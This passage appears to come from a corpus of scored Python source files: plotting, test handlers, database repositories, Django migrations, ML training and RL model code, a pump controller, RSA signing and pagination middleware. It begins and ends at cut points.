plt.plot([a, a], [1e-6, 1], 'k-', c="r", lw=2, label="Critical")
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
opticks_environment()
n1 = np.array([1.])
n2 = np.array([1.458])
fr = Fresnel(n1,n2)
fig = plt.figure()
fr.plot(fig, log_=True)
fig.show()
| 1.851563 | 2 |
tests/resources/my_dummy_handlers/dummy_handler_multiple_args_too_few.py | stude1/robotframework-oxygen | 13 | 44292 | <filename>tests/resources/my_dummy_handlers/dummy_handler_multiple_args_too_few.py<gh_stars>10-100
from oxygen import BaseHandler
class MyDummyHandler(BaseHandler):
'''
A test handler that throws mismatch argument exception because
parse_results expects too many arguments
'''
def run_my_dummy_handler(self, result_file):
return result_file, 'foo'
def parse_results(self, result_file, foo, bar):
return {
'name': result_file,
'foo': foo,
'bar': bar
}
| 1.523438 | 2 |
app/core/db.py | oxfn/owtest | 0 | 44420 | <filename>app/core/db.py
import logging
from typing import Iterable, Type
from bson import ObjectId
from fastapi import Depends
from motor.core import AgnosticClient, AgnosticCollection, AgnosticDatabase
from motor.motor_asyncio import AsyncIOMotorClient
from pymongo.results import InsertOneResult
from app.models import IdentityModel
from .settings import Settings, get_settings
logger = logging.getLogger(__name__)
async def get_db(settings: Settings = Depends(get_settings)):
"""Initialize database."""
try:
client: AgnosticClient = AsyncIOMotorClient(settings.mongo_url)
yield client.get_database()
finally:
client.close()
class BaseRepository:
"""Base repository class."""
collection_name: str = ""
model_type: Type[IdentityModel] = IdentityModel
def __init__(self, db: AgnosticDatabase = Depends(get_db, use_cache=True)):
"""Initializer."""
self.col: AgnosticCollection = db[self.collection_name]
def _construct(self, attrs: dict) -> model_type:
"""Construct Pydantic model from Mongo object dict."""
attrs["id"] = str(attrs["_id"])
return self.model_type(**attrs)
def _deconstruct(self, obj: model_type) -> dict:
"""Deconstructs model for Mongo."""
attrs = obj.dict()
if attrs.get("id"):
attrs["_id"] = ObjectId(attrs["id"])
del attrs["id"]
return attrs
async def get(self, **attrs) -> model_type:
"""Get one item."""
db_item: dict = await self.col.find_one(attrs)
return self._construct(db_item) if db_item else None
    async def get_all(self, **attrs) -> Iterable[model_type]:
        """Get all items matching the given attributes."""
db_items: Iterable[dict] = self.col.find(attrs)
return [self._construct(i) async for i in db_items]
async def create(self, obj: model_type) -> model_type:
"""Create item."""
res: InsertOneResult = await self.col.insert_one(self._deconstruct(obj))
db_item = await self.col.find_one(res.inserted_id)
return self._construct(db_item)
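# Illustrative sketch (hypothetical, not used elsewhere in the app): a concrete
# repository is declared by pointing BaseRepository at a collection name and a
# model type. "books" is an invented collection name; IdentityModel is reused
# here only to keep the example self-contained.
class BookRepository(BaseRepository):
    """Hypothetical repository bound to the 'books' collection."""
    collection_name = "books"
    model_type = IdentityModel
# In a FastAPI route the repository would be injected, e.g.:
#   async def list_books(repo: BookRepository = Depends(BookRepository)):
#       return await repo.get_all()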
| 1.640625 | 2 |
djangoq_demo/order_reminder/migrations/0001_initial.py | forance/django-q | 0 | 44548 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-17 12:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='orders',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order_id', models.PositiveIntegerField()),
('order_amount', models.DecimalField(decimal_places=2, max_digits=8)),
('customer', models.CharField(max_length=200, null=True, unique=True, verbose_name=b'Company Name')),
('ship_date', models.DateField(help_text=b'Please use the following format: YYYY/MM/DD.', null=True)),
],
),
]
| 0.847656 | 1 |
set_dictionary/abstractdict.py | pinmingkenan/python_structure | 0 | 44676 | # coding = utf-8
from inherit_abstract.abstractcollection import AbstractCollection
class AbstractDict(AbstractCollection):
"""
Common data and method implementations for dictionaries.
"""
def __init__(self, source_collection):
"""
Will copy items to the collection from source_collection if it's present.
"""
AbstractCollection.__init__(self)
if source_collection:
for key, value in source_collection:
self[key] = value
def __str__(self):
return "{" + ", ".join(map(str, self.items())) + "}"
def __and__(self, other):
"""
        Returns a new dictionary containing the contents of self and other.
:param other:
:return:
"""
result = type(self)(map(lambda item: (item.key, item.value), self.items()))
for key in other:
result[key] = other[key]
return result
def __eq__(self, other):
"""
Returns True if self equals other, or False otherwise.
:param other:
:return:
"""
if self is other:
return True
if type(self) != type(other) or len(self) != len(other):
return False
for key in self:
if not key in other:
return False
return True
def keys(self):
"""
Returns a iterator on the keys in the dictionary.
:return:
"""
return iter(self)
def values(self):
"""
        Returns an iterator on the values in the dictionary.
:return:
"""
return iter(map(lambda key: self[key], self))
def items(self):
"""
Returns an iterator on the items in the dictionary.
:return:
"""
return iter(map(lambda key: Item(key, self[key]), self))
class Item(object):
"""
Represents a dictionary item. Supports comparisons by key.
"""
def __init__(self, key, value):
self.key = key
self.value = value
def __str__(self):
return str(self.key) + ":" + str(self.value)
def __eq__(self, other):
if type(self) != type(other):
return False
return self.key == other.key
def __lt__(self, other):
if type(self) != type(other):
return False
return self.key < other.key
def __le__(self, other):
if type(self) != type(other):
return False
return self.key <= other.key
| 3.296875 | 3 |
daiquiri/metadata/migrations/0025_add_published_updated.py | agy-why/daiquiri | 14 | 44804 | # Generated by Django 2.1.4 on 2019-05-29 11:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('daiquiri_metadata', '0024_django2'),
]
operations = [
migrations.AddField(
model_name='schema',
name='published',
field=models.DateField(blank=True, null=True, verbose_name='Published'),
),
migrations.AddField(
model_name='schema',
name='updated',
field=models.DateField(blank=True, null=True, verbose_name='Updated'),
),
migrations.AddField(
model_name='table',
name='published',
field=models.DateField(blank=True, null=True, verbose_name='Published'),
),
migrations.AddField(
model_name='table',
name='updated',
field=models.DateField(blank=True, null=True, verbose_name='Updated'),
),
]
| 0.765625 | 1 |
plenum/test/logging/test_logging_txn_state.py | steptan/indy-plenum | 0 | 44932 | <gh_stars>0
import functools
from stp_core.loop.eventually import eventually
from plenum.common.constants import STEWARD, DOMAIN_LEDGER_ID
from plenum.test.pool_transactions.conftest import looper, stewardAndWallet1, \
steward1, stewardWallet, client1, clientAndWallet1, client1Connected
from plenum.test.pool_transactions.helper import sendAddNewClient
from plenum.test import waits
from plenum.test.helper import ensureRejectsRecvd, sdk_send_random_and_check
ERORR_MSG = "something went wrong"
whitelist = [ERORR_MSG]
def testLoggingTxnStateForValidRequest(
looper, logsearch, txnPoolNodeSet,
sdk_pool_handle, sdk_wallet_client):
logsPropagate, _ = logsearch(
levels=['INFO'], files=['propagator.py'],
funcs=['propagate'], msgs=['propagating.*request.*from client']
)
logsOrdered, _ = logsearch(
levels=['INFO'], files=['replica.py'],
funcs=['order_3pc_key'], msgs=['ordered batch request']
)
logsCommited, _ = logsearch(
levels=['INFO'], files=['node.py'],
funcs=['executeBatch'], msgs=['committed batch request']
)
reqs = sdk_send_random_and_check(looper, txnPoolNodeSet, sdk_pool_handle, sdk_wallet_client, 1)
req, _ = reqs[0]
reqId = str(req['reqId'])
assert any(reqId in record.getMessage() for record in logsPropagate)
assert any(reqId in record.getMessage() for record in logsOrdered)
assert any(reqId in record.getMessage() for record in logsCommited)
def testLoggingTxnStateForInvalidRequest(
looper, txnPoolNodeSet, clientAndWallet1, client1Connected, logsearch):
client, clientWallet = clientAndWallet1
logsPropagate, _ = logsearch(
levels=['INFO'], files=['propagator.py'],
funcs=['propagate'], msgs=['propagating.*request.*from client']
)
logsReject, _ = logsearch(
levels=['WARNING'], files=['replica.py'],
funcs=['processReqDuringBatch'],
msgs=['encountered exception.*while processing.*will reject']
)
req, wallet = sendAddNewClient(STEWARD, "name", client, clientWallet)
ensureRejectsRecvd(
looper, txnPoolNodeSet, client,
reason="Only Steward is allowed to do these transactions",
timeout=waits.expectedReqRejectQuorumTime()
)
reqId = str(req.reqId)
assert any(reqId in record.getMessage() for record in logsPropagate)
assert any(reqId in record.getMessage() for record in logsReject)
def testLoggingTxnStateWhenCommitFails(
looper, txnPoolNodeSet, steward1, stewardWallet, logsearch):
logsPropagate, _ = logsearch(
levels=['INFO'], files=['propagator.py'],
funcs=['propagate'], msgs=['propagating.*request.*from client']
)
logsOrdered, _ = logsearch(
levels=['INFO'], files=['replica.py'],
funcs=['order_3pc_key'], msgs=['ordered batch request']
)
logsCommitFail, _ = logsearch(
levels=['WARNING'], files=['node.py'],
funcs=['executeBatch'], msgs=['commit failed for batch request']
)
req, wallet = sendAddNewClient(None, "name", steward1, stewardWallet)
class SomeError(Exception):
pass
def commitPatched(node, commitOrig, *args, **kwargs):
req_handler = node.get_req_handler(ledger_id=DOMAIN_LEDGER_ID)
req_handler.commit = commitOrig
raise SomeError(ERORR_MSG)
excCounter = 0
def executeBatchPatched(node, executeBatchOrig, *args, **kwargs):
nonlocal excCounter
try:
executeBatchOrig(*args, **kwargs)
except SomeError:
excCounter += 1
node.executeBatch = executeBatchOrig
pass
def checkSufficientExceptionsHappend():
assert excCounter == len(txnPoolNodeSet)
return
for node in txnPoolNodeSet:
req_handler = node.get_req_handler(ledger_id=DOMAIN_LEDGER_ID)
req_handler.commit = functools.partial(
commitPatched, node, req_handler.commit
)
node.executeBatch = functools.partial(
executeBatchPatched, node, node.executeBatch
)
timeout = waits.expectedTransactionExecutionTime(len(txnPoolNodeSet))
looper.run(
eventually(checkSufficientExceptionsHappend,
retryWait=1, timeout=timeout))
reqId = str(req.reqId)
assert any(reqId in record.getMessage() for record in logsPropagate)
assert any(reqId in record.getMessage() for record in logsOrdered)
assert any(reqId in record.getMessage() for record in logsCommitFail)
assert any(ERORR_MSG in record.getMessage() for record in logsCommitFail)
| 1.203125 | 1 |
model.py | cynthia3r/flower_image_classifier | 1 | 45060 | <gh_stars>1-10
import torch
from torchvision import models
import time
'''
Functions related to training model
'''
def save_checkpoint(model, optimizer, train_data, arch, save_dir):
# TODO COMPLETED: Save the checkpoint
model.to('cpu')
print("Our model: \n\n", model, '\n')
print("The state dict keys: \n\n", model.state_dict().keys())
# Saving the model (The trained model is saved as a checkpoint along with associated
# hyperparameters and the class_to_idx dictionary)
checkpoint = {'classifier': model.classifier,
'class_to_idx': train_data.class_to_idx,
'state_dict': model.state_dict(),
'arch': arch,
'optimizer': optimizer,
'optimizer_state_dict': optimizer.state_dict()}
torch.save(checkpoint, save_dir)
# TODO COMPLETED: Write a function that loads a checkpoint and rebuilds the model
# Loading checkpoints (The function successfully loads a checkpoint and rebuilds the model)
def load_checkpoint(model_input):
checkpoint = torch.load(model_input)
if checkpoint['arch'] == 'vgg16':
model = models.vgg16(pretrained=True)
elif checkpoint['arch'] == 'densenet121':
model = models.densenet121(pretrained=True)
model.classifier = checkpoint['classifier']
model.class_to_idx = checkpoint['class_to_idx']
model.load_state_dict(checkpoint['state_dict'])
# load the optimizer from saved checkpoint
optimizer = checkpoint['optimizer']
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
return model, optimizer
# Define Validation function for the model
def validate_model(model, validloader, criterion, device):
valid_loss = 0
accuracy = 0
model.to(device)
# Looping through it, get a batch on each loop
# validation pass here
for images, labels in validloader:
images, labels = images.to(device), labels.to(device)
# Forward pass, get our log-probabilities
outputs = model.forward(images)
# Calculate the loss with the calculated log-probabilities and the labels
valid_loss += criterion(outputs, labels)
# Calculate accuracy
# Output of the network are log-probabilities, need to take exponential for probabilities
ps = torch.exp(outputs)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor))
return valid_loss, accuracy
# Training a network: successfully trains a new network on a dataset of images
# Model hyperparameters: The training model run based on user set hyperparameters such as training epochs
# Training with GPU: The training model allows users to choose training the model based on device (gpu, cpu)
def train_model(model, trainloader, validloader, criterion, num_epochs, optimizer, device):
# TODO COMPLETED: Build and train your network
# Training the network (The parameters of the feedforward classifier are appropriately trained,
# while the parameters of the feature network are left static)
steps = 0
batch_size = 16
train_losses, valid_losses = [], []
model.to(device)
for epoch in range(num_epochs):
epoch_start_time = time.time()
running_loss = 0
for images, labels in trainloader:
# Move input and label tensors to the default device
images, labels = images.to(device), labels.to(device)
steps += 1
# Clear the gradients, do this because gradients are accumulated
optimizer.zero_grad()
# Forward pass, then backward pass, then update weights
# Forward pass, get our log-probabilities
outputs = model.forward(images)
# Calculate the loss with the calculated log-probabilities and the labels
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % batch_size == 0:
# Validate model
valid_loss = 0
accuracy = 0
# set model to evaluation mode for predictions
model.eval()
# Turn off gradients for validation, saves memory and computations
with torch.no_grad():
valid_loss, accuracy = validate_model(model, validloader, criterion, device)
train_losses.append(running_loss / len(trainloader))
valid_losses.append(valid_loss / len(validloader))
# Training validation log: The training loss, validation loss, and
# validation accuracy are printed out as a network trains
print("Epoch: {}/{}.. ".format(epoch + 1, num_epochs),
"Training Loss: {:.3f}.. ".format(train_losses[-1]),
"Validation Loss: {:.3f}.. ".format(valid_losses[-1]),
"Validation Accuracy: {:.3f}%".format((100 * accuracy) / len(validloader)))
running_loss = 0
# set model back to train mode
model.train()
# Calculate and print Epoch duration
epoch_time_elapsed = time.time() - epoch_start_time
print("Epoch {} Run Time: {:.0f}m {:.0f}s".format(epoch + 1, epoch_time_elapsed // 60, epoch_time_elapsed % 60))
return model, optimizer
# TODO COMPLETED: Do validation on the test input data
def test_model(model, testloader, device):
accuracy = 0
model.to(device)
# Turn off gradients for validation, saves memory and computations
with torch.no_grad():
# set model to evaluation mode for predictions
model.eval()
# Looping through it, get a batch on each loop
# test validation pass here
for images, labels in testloader:
images, labels = images.to(device), labels.to(device)
outputs = model.forward(images)
# Calculate accuracy
# Get the class probabilities
ps = torch.exp(outputs)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor))
# set model back to train mode
model.train()
# Testing Accuracy (The network's accuracy is measured on the test data)
print("Test Accuracy: {:.3f}%".format(100 * accuracy / len(testloader)))
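# Illustrative usage sketch (hypothetical names): a typical checkpoint round trip
# after training; 'flower_model.pth' is an invented path, and model, optimizer,
# train_data, testloader and device come from the calling training script.
#
#   save_checkpoint(model, optimizer, train_data, arch='vgg16', save_dir='flower_model.pth')
#   model, optimizer = load_checkpoint('flower_model.pth')
#   test_model(model, testloader, device)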
| 2.28125 | 2 |
_task.py | zemogle/twittervotes | 0 | 45188 | from tempfile import mkstemp
import os
import tinys3
def create_temp_file(data):
fd, temp_path = mkstemp()
    file = open(temp_path, 'w')
file.write(data)
file.close()
os.close(fd)
return data
def push_to_s3(filepath):
s3 = tinys3.Connection(os.environ['AWS_ACCESS_KEY_ID'],os.environ['AWS_SECRET_KEY'],tls=True)
f = open(filepath,'rb')
s3.upload(filepath, f ,'darkmattersheep.uk/strictly/')
return
| 1.398438 | 1 |
greenpithumb/pump.py | markselias/GreenPiThumb | 83 | 45316 | import logging
logger = logging.getLogger(__name__)
# Pump rate in mL/s (4.3 L/min)
_PUMP_RATE_ML_PER_SEC = 4300.0 / 60.0
# Default amount of water to add to the plant (in mL) when pump manager detects
# low soil moisture.
DEFAULT_PUMP_AMOUNT = 200
class Pump(object):
"""Wrapper for a Seaflo 12V water pump."""
def __init__(self, pi_io, clock, pump_pin):
"""Creates a new Pump wrapper.
Args:
pi_io: Raspberry Pi I/O interface.
clock: A clock interface.
pump_pin: Raspberry Pi pin to which the pump is connected.
"""
self._pi_io = pi_io
self._clock = clock
self._pump_pin = pump_pin
def pump_water(self, amount_ml):
"""Pumps the specified amount of water.
Args:
amount_ml: Amount of water to pump (in mL).
Raises:
ValueError: The amount of water to be pumped is invalid.
"""
if amount_ml == 0.0:
return
elif amount_ml < 0.0:
raise ValueError('Cannot pump a negative amount of water')
else:
logger.info('turning pump on (with GPIO pin %d)', self._pump_pin)
self._pi_io.turn_pin_on(self._pump_pin)
wait_time_seconds = amount_ml / _PUMP_RATE_ML_PER_SEC
self._clock.wait(wait_time_seconds)
logger.info('turning pump off (with GPIO pin %d)', self._pump_pin)
self._pi_io.turn_pin_off(self._pump_pin)
logger.info('pumped %.f mL of water', amount_ml)
return
class PumpManager(object):
"""Pump Manager manages the water pump."""
def __init__(self, pump, pump_scheduler, moisture_threshold, pump_amount,
timer):
"""Creates a PumpManager object, which manages a water pump.
Args:
pump: A pump instance, which supports water pumping.
pump_scheduler: A pump scheduler instance that controls the time
periods in which the pump can be run.
moisture_threshold: Soil moisture threshold. If soil moisture is
below this value, manager pumps water on pump_if_needed calls.
pump_amount: Amount (in mL) to pump every time the water pump runs.
timer: A timer that counts down until the next forced pump. When
this timer expires, the pump manager runs the pump once,
regardless of the moisture level.
"""
self._pump = pump
self._pump_scheduler = pump_scheduler
self._moisture_threshold = moisture_threshold
self._pump_amount = pump_amount
self._timer = timer
def pump_if_needed(self, moisture):
"""Run the water pump if there is a need to run it.
Args:
moisture: Soil moisture level
Returns:
The amount of water pumped, in mL.
"""
if self._should_pump(moisture):
self._pump.pump_water(self._pump_amount)
self._timer.reset()
return self._pump_amount
return 0
def _should_pump(self, moisture):
"""Returns True if the pump should be run."""
if not self._pump_scheduler.is_running_pump_allowed():
return False
return (moisture < self._moisture_threshold) or self._timer.expired()
class PumpScheduler(object):
"""Controls when the pump is allowed to run."""
def __init__(self, local_clock, sleep_windows):
"""Creates new PumpScheduler instance.
Args:
local_clock: A local clock interface
sleep_windows: A list of 2-tuples, each representing a sleep window.
Tuple items are datetime.time objects.
"""
self._local_clock = local_clock
self._sleep_windows = sleep_windows
def is_running_pump_allowed(self):
"""Returns True if OK to run pump, otherwise False.
Pump is not allowed to run from the start of a sleep window (inclusive)
to the end of a sleep window (exclusive).
"""
current_time = self._local_clock.now().time()
for sleep_time, wake_time in self._sleep_windows:
# Check if sleep window wraps midnight.
if wake_time < sleep_time:
if current_time >= sleep_time or current_time < wake_time:
return False
else:
if sleep_time <= current_time < wake_time:
return False
return True
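# Illustrative sketch (hypothetical clock object): a single sleep window that
# wraps midnight, e.g. 23:00 -> 07:00, during which the pump must not run.
#
#   import datetime
#   windows = [(datetime.time(23, 0), datetime.time(7, 0))]
#   scheduler = PumpScheduler(local_clock, sleep_windows=windows)
#   if scheduler.is_running_pump_allowed():
#       pump.pump_water(DEFAULT_PUMP_AMOUNT)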
| 2.5 | 2 |
python/Clique_Percolation_Method.py | JasonPap/graphproject | 1 | 45444 | __author__ = 'Jason'
import itertools
from Graph import *
from GraphStatistics import *
def get_cliques(graph, k, proc_pool):
persons = []
for idx in graph.dictionary:
persons.append(idx)
cliques = []
combinations = itertools.combinations(persons, k)
arg = []
for comb in combinations:
arg.append((comb, graph))
results = proc_pool.map(test, arg)
for result in results:
if result[0] == True:
cliques.append(result[1])
return cliques
def test(arg):
combination = arg[0]
graph = arg[1]
local_comb = list(combination)
for idx in combination:
others = list(local_comb)
others.remove(idx)
links = graph.dictionary[idx].links
linked_ids = []
for edge in links:
linked_ids.append(edge.edge_end)
for neighbour in others:
if neighbour not in linked_ids:
return False, None
local_comb.remove(idx)
return True, combination
def percolation_method(graph, k, proc_pool):
l_cliques = get_cliques(graph, k, proc_pool)
g_cliques = Graph()
for i in range(len(l_cliques)):
node = Node(i, [], [])
g_cliques.insert_node(node)
arg = []
for i in range(len(l_cliques)):
arg.append((i, l_cliques, k))
results = proc_pool.map(get_hyper_edges, arg)
for result in results:
for hyper_edge in result:
edge = Edge(hyper_edge[1], [])
g_cliques.insert_edge(hyper_edge[0], edge)
cc = get_connected_components(g_cliques)
communities = []
counter = 1
for component in cc:
persons = []
for clique_id in component:
for p_id in l_cliques[clique_id]:
if p_id not in persons:
persons.append(p_id)
persons.sort()
communities.append((counter, persons))
counter += 1
return communities
def get_hyper_edges(arg):
clique_id = arg[0]
l_cliques = arg[1]
k = arg[2]
result = []
main_clique = l_cliques[clique_id]
for i in range(len(l_cliques)):
counter = 0
if i != clique_id:
for val in main_clique:
if val in l_cliques[i]:
counter += 1
if counter >= k - 1:
result.append((clique_id, i))
return result
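# Illustrative usage sketch (hypothetical objects): `graph` is a Graph populated
# with Node/Edge instances as defined in Graph.py, and k is the clique size.
#
#   from multiprocessing import Pool
#   with Pool() as pool:
#       communities = percolation_method(graph, k=3, proc_pool=pool)
#   for community_id, members in communities:
#       print(community_id, members)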
| 2.421875 | 2 |
utils/rsa.py | vsgobbi/nfe-library | 0 | 45572 | from base64 import b64encode
from hashlib import sha1
from Crypto.Hash import SHA
from Crypto.Signature import PKCS1_v1_5
from Crypto.PublicKey import RSA
class Rsa:
@classmethod
def sign(cls, text, privateKeyContent):
digest = SHA.new(text)
rsaKey = RSA.importKey(privateKeyContent)
signer = PKCS1_v1_5.new(rsaKey)
signature = signer.sign(digest)
return b64encode(signature)
@classmethod
def digest(cls, text):
hasher = sha1()
hasher.update(text)
digest = hasher.digest()
return b64encode(digest)
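# Illustrative usage sketch (hypothetical key material): both helpers expect
# bytes, and the private key is a PEM-encoded RSA key read from disk.
#
#   with open('private_key.pem', 'rb') as key_file:
#       signature_b64 = Rsa.sign(b'payload to sign', key_file.read())
#   digest_b64 = Rsa.digest(b'payload to hash')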
| 1.523438 | 2 |
commit_data.py | iwangjian/ByteCup2018 | 80 | 45700 | <filename>commit_data.py
import os
import argparse
def process_decoded(args):
if not os.path.exists(args.result_dir):
os.mkdir(args.result_dir)
    punct = ["/", "`", "+", "-", ";", "-lrb-", "-rrb-", "``", "|", "~", "\""]
for file in os.listdir(args.decode_dir):
file_path = os.path.join(args.decode_dir, file)
file_id = int(str(file).split('.')[0]) + 1
res_file = str(file_id) + '.txt'
res_path = os.path.join(args.result_dir, res_file)
temp = []
with open(file_path, 'r') as fr:
text = fr.read().strip()
data = text.split(" ")
for word in data:
if not word in punct:
temp.append(word)
with open(res_path, 'w', encoding='utf-8') as fw:
fw.write(" ".join(temp))
fw.write('\n')
print("Finished: %s" % args.result_dir)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert decoded files to commit files')
parser.add_argument('--decode_dir', action='store', required=True,
help='directory of decoded summaries')
parser.add_argument('--result_dir', action='store', required=True,
help='directory of submission')
args = parser.parse_args()
process_decoded(args)
| 1.726563 | 2 |
Discrete2D/torch-ac-composable/torch_ac_composable/models/acmodel_modular_fixed.py | Lifelong-ML/Mendez2022ModularLifelongRL | 0 | 45828 | '''
This version uses a Q function for PPO, the same that is
later used for BCQ
'''
import torch
import torch.nn as nn
import torch.autograd as autograd
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
import random
import numpy as np
# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py
def init_params(m):
classname = m.__class__.__name__
if classname.find("Linear") != -1:
m.weight.data.normal_(0, 1)
m.weight.data *= 1 / torch.sqrt(m.weight.data.pow(2).sum(1, keepdim=True))
if m.bias is not None:
m.bias.data.fill_(0)
class ACModelModularFixed(nn.Module):
def __init__(
self,
input_shape,
num_actions,
agent_dyn_dict,
static_object_dict,
target_object_dict,
max_modules=0,
threshold=0.3,
device=torch.device('cuda'),
):
super().__init__()
self.use_bcq = {}
self.threshold = threshold
self.device = device
if isinstance(max_modules, (int, float)):
max_modules = max_modules if max_modules != 0 else np.inf
max_modules = [max_modules] * 4
# List of selections of modules per task
self.static_object_dict = static_object_dict
self.target_object_dict = target_object_dict
self.agent_dyn_dict = agent_dyn_dict
self.input_shape = input_shape
self.num_actions = num_actions
self.recurrent = False
self.recurrence = 1
self.max_modules = max_modules
self.num_modules = max_modules
self.sizes = [8, 16, 32, 64]
self.num_tasks = 0
# Static object (conv0 and 1)
self.static = nn.ModuleList()
for i in range(max_modules[0]):
self.static.append(nn.Sequential(
nn.Conv2d(5, 8, kernel_size=2),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(8, 16, kernel_size=2),
nn.ReLU()
).to(self.device))
# Target object (conv2)
self.target_pre = nn.ModuleList()
self.target_post = nn.ModuleList()
for i in range(max_modules[1]):
self.target_pre.append(nn.Sequential(
nn.Conv2d(1, 8, kernel_size=2),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(8, 16, kernel_size=2),
nn.ReLU()
).to(self.device))
self.target_post.append(nn.Sequential(
nn.Conv2d(32, 32, kernel_size=2),
nn.ReLU()
).to(self.device))
# Agent dynamics (actor, critic)
self.agent_pre = nn.ModuleList()
for i in range(max_modules[2]):
self.agent_pre.append(nn.Sequential(
nn.Conv2d(1, 8, kernel_size=2),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(8, 16, kernel_size=2),
nn.ReLU(),
nn.Conv2d(16, 32, kernel_size=2),
nn.ReLU()
).to(self.device))
self.actor_layers = nn.ModuleList()
self.critic_layers = nn.ModuleList()
for i in range(max_modules[2]):
self.actor_layers.append(nn.Sequential(
nn.Linear(self.feature_size(), self.sizes[3]),
nn.Tanh(),
nn.Linear(self.sizes[3], self.num_actions)
).to(self.device))
self.critic_layers.append(nn.Sequential(
nn.Linear(self.feature_size(), self.sizes[3]),
nn.Tanh(),
nn.Linear(self.sizes[3], self.num_actions)
).to(self.device))
# Initialize parameters correctly
self.apply(init_params)
self.to(self.device)
def features(self, x, task_id):
n = x.shape[0]
x_static = x[:, :5, :, :]
x_target = x[:, 5:6, :, :]
x_agent = x[:, 6:, :, :]
x_static = self.static[self.static_object_dict[task_id]](x_static)
x_target = self.target_pre[self.target_object_dict[task_id]](x_target)
x_target = torch.cat((x_static, x_target), dim=1)
x_target = self.target_post[self.target_object_dict[task_id]](x_target)
x_agent = self.agent_pre[self.agent_dyn_dict[task_id]](x_agent)
x_agent = torch.cat((x_target, x_agent), dim=1)
return x_agent
def fc(self, x, task_id, return_bc=False):
if return_bc:
x_q = self.critic_layers[self.agent_dyn_dict[task_id]](x)
x_bc = self.actor_layers[self.agent_dyn_dict[task_id]](x)
return x_q, F.log_softmax(x_bc, dim=1), x_bc
x_actor = self.actor_layers[self.agent_dyn_dict[task_id]](x)
x_critic = self.critic_layers[self.agent_dyn_dict[task_id]](x).max(dim=1, keepdim=True)[0]
return x_actor, x_critic
def forward(self, obs, task_id, return_bc=False):
x = obs.image.transpose(1, 3).transpose(2, 3)
x = self.features(x, task_id)
features = x.view(x.size(0), -1)
x = self.fc(features, task_id, return_bc)
if not return_bc:
x_actor, x_critic = x
dist = Categorical(logits=F.log_softmax(x_actor, dim=1))
value = x_critic.squeeze(1)
return dist, value
return x
def feature_size(self):
x = autograd.Variable(torch.zeros(1, *self.input_shape, device=self.device).transpose(1, 3).transpose(2, 3))
x_static = x[:, :5, :, :]
x_target = x[:, 5:6, :, :]
x_agent = x[:, 6:, :, :]
x_static = self.static[0](x_static)
x_target = self.target_pre[0](x_target)
x_target = torch.cat((x_static, x_target), dim=1)
x_target = self.target_post[0](x_target)
x_agent = self.agent_pre[0](x_agent)
x_agent = torch.cat((x_target, x_agent), dim=1)
return x_agent.reshape(1, -1).size(1)
def act(self, state, epsilon, task_id):
# with torch.no_grad():
# q_value, bc_prob, _ = self.forward(state, task_id, return_bc=True)
# bc_prob = bc_prob.exp()
# bc_prob = (bc_prob / bc_prob.max(1, keepdim=True)[0] > self.threshold).float()
# q_value = (bc_prob * q_value + (1 - bc_prob) * -1e8)
# dist = Categorical(logits=F.log_softmax(q_value, dim=1))
# action = dist.sample()
# return action
with torch.no_grad():
q_value, bc_prob, _ = self.forward(state, task_id, return_bc=True)
bc_prob = bc_prob.exp()
bc_prob = (bc_prob / bc_prob.max(1, keepdim=True)[0] > self.threshold).float()
q_value = (bc_prob * q_value + (1 - bc_prob) * -1e8)
dist = Categorical(logits=F.log_softmax(q_value, dim=1))
action = dist.sample()
return action
def add_task(self, task_id, static_object, target_object, agent_dyn):
self.static_object_dict[task_id] = static_object
self.target_object_dict[task_id] = target_object
self.agent_dyn_dict[task_id] = agent_dyn
self.set_use_bcq(task_id, False)
def set_use_bcq(self, task_id, use_bcq=False):
self.use_bcq[task_id] = use_bcq
def anneal_tau(*args, **kwargs):
pass | 2.046875 | 2 |
djfw/pagination/middleware.py | kozzztik/tulius | 1 | 45956 | import asyncio
def get_page(self):
"""
A function which will be monkeypatched onto the request to get the current
integer representing the current page.
"""
try:
if self.POST:
p = self.POST['page']
else:
p = self.GET['page']
if p == 'last':
return 'last'
return int(p)
except (KeyError, ValueError, TypeError):
return 1
def pagination_middleware(get_response):
if asyncio.iscoroutinefunction(get_response):
return AsyncPaginationMiddleware(get_response)
return PaginationMiddleware(get_response)
class PaginationMiddleware:
"""
Inserts a variable representing the current page onto the request object if
it exists in either **GET** or **POST** portions of the request.
"""
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
request.page = get_page(request)
return self.get_response(request)
class AsyncPaginationMiddleware:
_is_coroutine = asyncio.coroutines._is_coroutine
def __init__(self, get_response):
self.get_response = get_response
async def __call__(self, request):
request.page = get_page(request)
return await self.get_response(request)
pagination_middleware.async_capable = True
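# Illustrative usage sketch: the middleware is enabled by adding its dotted path
# to MIDDLEWARE (path assumed from this module's location in the repo), after
# which views can read the page number directly from the request.
#
#   MIDDLEWARE = [
#       ...,
#       'djfw.pagination.middleware.pagination_middleware',
#   ]
#
#   def article_list(request):
#       page = request.page  # 1 when missing/invalid, or the string 'last'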
| 1.992188 | 2 |
build/platform/python/tests/test_common.py | jochenater/catboost | 6,989 | 46084 | import subprocess
import pytest
from build.platform.python.tests import testlib
PYTHON_VERSIONS = ["2.7", "3.4", "3.5", "3.6"] # 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_version_matched(pyver):
testlib.check_python_version(pyver)
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_max_unicode_bytes(pyver):
